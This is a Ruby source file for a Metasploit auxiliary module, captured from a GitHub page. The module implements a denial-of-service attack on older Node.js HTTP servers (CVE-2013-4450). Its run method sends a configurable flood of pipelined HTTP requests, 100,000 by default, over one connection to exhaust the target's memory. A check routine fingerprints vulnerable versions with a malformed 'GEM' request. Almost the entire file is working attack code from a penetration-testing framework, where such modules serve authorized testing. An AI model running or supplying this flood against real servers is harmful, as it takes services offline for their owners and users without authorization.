Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Fetching contributors…

Cannot retrieve contributors at this time

93 lines (82 sloc) 2.959 kb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Node.js HTTP Pipelining Denial of Service',
'Description' => %q{
This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions
released before 0.10.21 and 0.8.26. The attack sends many pipelined
HTTP requests on a single connection, which causes unbounded memory
allocation when the client does not read the responses.
},
'Author' =>
[
'Marek Majkowski', # Vulnerability discovery
'titanous', # Metasploit module
'joev' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-4450' ],
[ 'OSVDB', '98724' ],
[ 'BID' , '63229' ],
[ 'URL', 'http://blog.nodejs.org/2013/10/22/cve-2013-4450-http-server-pipeline-flood-dos' ]
],
'DisclosureDate' => 'Oct 18 2013'))
register_options(
[
Opt::RPORT(80),
OptInt.new('RLIMIT', [true, "Number of requests to send", 100000])
],
self.class)
end
def check
# http://blog.nodejs.org/2013/08/21/node-v0-10-17-stable/
# check if we are < 0.10.17 by seeing if a malformed HTTP request is accepted
status = Exploit::CheckCode::Safe
connect
sock.put(http_request("GEM"))
begin
response = sock.get_once
status = Exploit::CheckCode::Appears if response =~ /HTTP/
rescue EOFError
# checking against >= 0.10.17 raises EOFError because there is no
# response to GEM requests
vprint_error("Failed to determine the vulnerable state due to an EOFError (no response)")
return Msf::Exploit::CheckCode::Unknown
ensure
disconnect
end
status
end
def host
host = datastore['RHOST']
host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
host
end
def http_request(method='GET')
"#{method} / HTTP/1.1\r\nHost: #{host}\r\n\r\n"
end
def run
payload = http_request
begin
print_status("Stressing the target memory...")
connect
datastore['RLIMIT'].times { sock.put(payload) }
print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Unable to connect to #{host}.")
rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached")
ensure
disconnect
end
end
end
Jump to Line
Something went wrong with that request. Please try again.